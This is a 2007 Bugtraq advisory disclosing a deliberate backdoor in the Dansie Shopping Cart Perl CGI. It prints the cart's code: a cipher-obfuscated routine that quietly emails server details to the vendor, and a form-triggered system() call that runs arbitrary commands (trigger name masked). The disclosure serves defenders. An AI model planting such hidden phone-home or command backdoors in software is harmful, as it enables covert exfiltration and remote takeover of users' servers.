[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070603225052.29424.qmail@securityfocus.com>
Date: 3 Jun 2007 22:50:52 -0000
From: h0tturk@...turk.com
To: bugtraq@...urityfocus.com
Subject: Dansie Cart Script Exploit Reported
Synopsis : This program -deliberately- allows arbitrary commands to be
executed on the victim server.
One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup. While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.
The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@...sie.net'. This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':
------
sub there2
{
$_ = "$_[0]";
tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
tr/_/-/;
tr/\@/\./;
return $_;
}
-------
The call that creates this email address and sends the mail is the
function 'there3'.
-------
sub there3
{
if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
{
$a = &there2('8v59')."\@".
&there2('kte3cv').".".
&there2('ev8');
$b = &there2('8v59_3jhhzi8');
pop(@there2);
pop(@there2);
$c = &there2("@there2");
open (TECH, "|$mailprog $a");
print TECH "To: $a\n";
print TECH "From: $a\n";
print TECH "Subject: $b\n\n";
print TECH "$path3\n";
print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
print TECH "$c\n";
print TECH "$e $there\n" if ($e);
close (TECH);
}
}
-------
The ciphered strings, when passed through 'there2', result in:
8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@...sie.net
$b == Subject: tech-support
This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.
While going through the rest of the code we discovered a much more
interesting item.
(We've masked out the actual trigger element with question marks)
----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || (
($FORM{'?????????'} ) && (!$d) ) )
{
if ( $ENV{'OS'} )
{
system("$FORM{'?????????'}");
}
else
{
open(ELIF,"|$FORM{'?????????'}");
}
exit;
}
--------
Powered by blists - more mailing lists